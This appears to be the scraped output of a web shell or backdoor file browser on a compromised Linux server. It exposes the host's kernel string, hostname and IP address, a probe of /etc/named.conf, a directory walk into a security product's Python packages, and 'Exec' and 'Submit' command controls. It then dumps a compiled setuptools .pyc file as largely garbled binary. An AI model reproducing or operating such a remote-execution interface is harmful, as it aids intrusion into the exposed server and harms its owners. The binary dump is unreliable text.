Linux server.a-j.media 5.14.0-570.44.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Sep 17 10:32:11 EDT 2025 x86_64
Apache
75.119.137.219
Cant read /etc/named.conf
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
setuptools
/
_distutils
/
command
/
__pycache__
/
[
drwxr-xr-x
]
[ HOME ]
Exec
Submit
build_scripts.cpython-311.pyc
� ��PÈJ�'� � � d Z ddlZddlZddlmZ ddlmZ ddlmZ ddl m Z ddlmZ dd l mZ ddlZ ej d � � Z eZ G d� de� � ZdS ) zRdistutils.command.build_scripts Implements the Distutils 'build_scripts' command.� N)�ST_MODE)� sysconfig� )�Command)�newer)�convert_path)�logz^#!.*python[0-9.]*([ ].*)?$c �f � e Zd ZdZg d�ZdgZd� Zd� Zd� Zd� Z d� Z d � Zd � Zd� Z ed� � � Zd S )� build_scriptsz("build" scripts (copy and fixup #! line)))z build-dir=�dzdirectory to "build" (copy) to)�force�fz1forcibly build everything (ignore file timestamps)zexecutable=�ez*specify final destination interpreter pathr c �>